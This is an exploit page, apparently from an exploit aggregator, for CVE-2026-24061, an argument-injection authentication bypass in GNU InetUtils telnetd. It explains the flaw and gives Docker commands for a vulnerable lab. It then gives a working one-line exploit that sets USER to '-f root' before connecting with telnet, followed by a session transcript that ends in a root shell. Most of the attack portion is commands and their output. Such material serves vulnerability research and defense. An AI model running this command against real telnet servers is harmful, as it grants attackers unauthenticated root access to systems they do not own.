Share
## https://sploitus.com/exploit?id=F46F1644-A0B8-59C7-A2AC-946C297B9A13
# GNU InetUtils telnetd Argument Injection Authentication Bypass (CVE-2026-24061)

*In January 2026, the GNU telnetd service from GNU InetUtils was found to be vulnerable to authentication-bypass by [Kyu Neushwaistein (aka Carlos Cortes Alvarez)](https://www.openwall.com/lists/oss-security/2026/01/20/2). Tracked as [CVE-2026-24061](https://nvd.nist.gov/vuln/detail/CVE-2026-24061), this flaw allows an attacker to establish a Telnet session without providing valid credentials, granting unauthorized access to the target system. The vulnerability exists all the way up to version 2.7-2 of the GNU telnetd service and looks like it was taken right out of the 90s.*

This is an argument injection vulnerability (CWE-88) with a CVSS v3.1 score of **9.8 (Critical)**.

References:

- https://www.openwall.com/lists/oss-security/2026/01/20/2
- https://nvd.nist.gov/vuln/detail/CVE-2026-24061
- https://www.safebreach.com/blog/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061/
- https://github.com/SafeBreach-Labs/CVE-2026-24061

## Vulnerable Environment

Build and run:

```bash
docker build -t telnetd-cve-2026-24061 .
docker run --rm -it -p 23:23 telnetd-cve-2026-24061
```

After the service starts, telnetd will be listening on port 23.

## Exploitation

The vulnerability allows bypassing authentication by injecting the `-f` flag into the `USER` environment variable. When `telnetd` receives a username starting with `-f`, it passes this to the login program which interprets `-f` as a flag to skip authentication.

Use the following command to exploit this vulnerability and gain `root` access:

```bash
# Linux client (requires -a option)
USER="-f root" telnet -a 127.0.0.1 23

# macOS client (no -a option needed)
USER="-f root" telnet 127.0.0.1 23
```

After successful exploitation, you will have root shell access without providing a password.

```bash
$ USER='-f root' telnet -a localhost 23
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Linux 6.14.0-37-generic (4dbc1b976c10) (pts/1)

Linux 4dbc1b976c10 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@4dbc1b976c10:~# id
uid=0(root) gid=0(root) groups=0(root)
```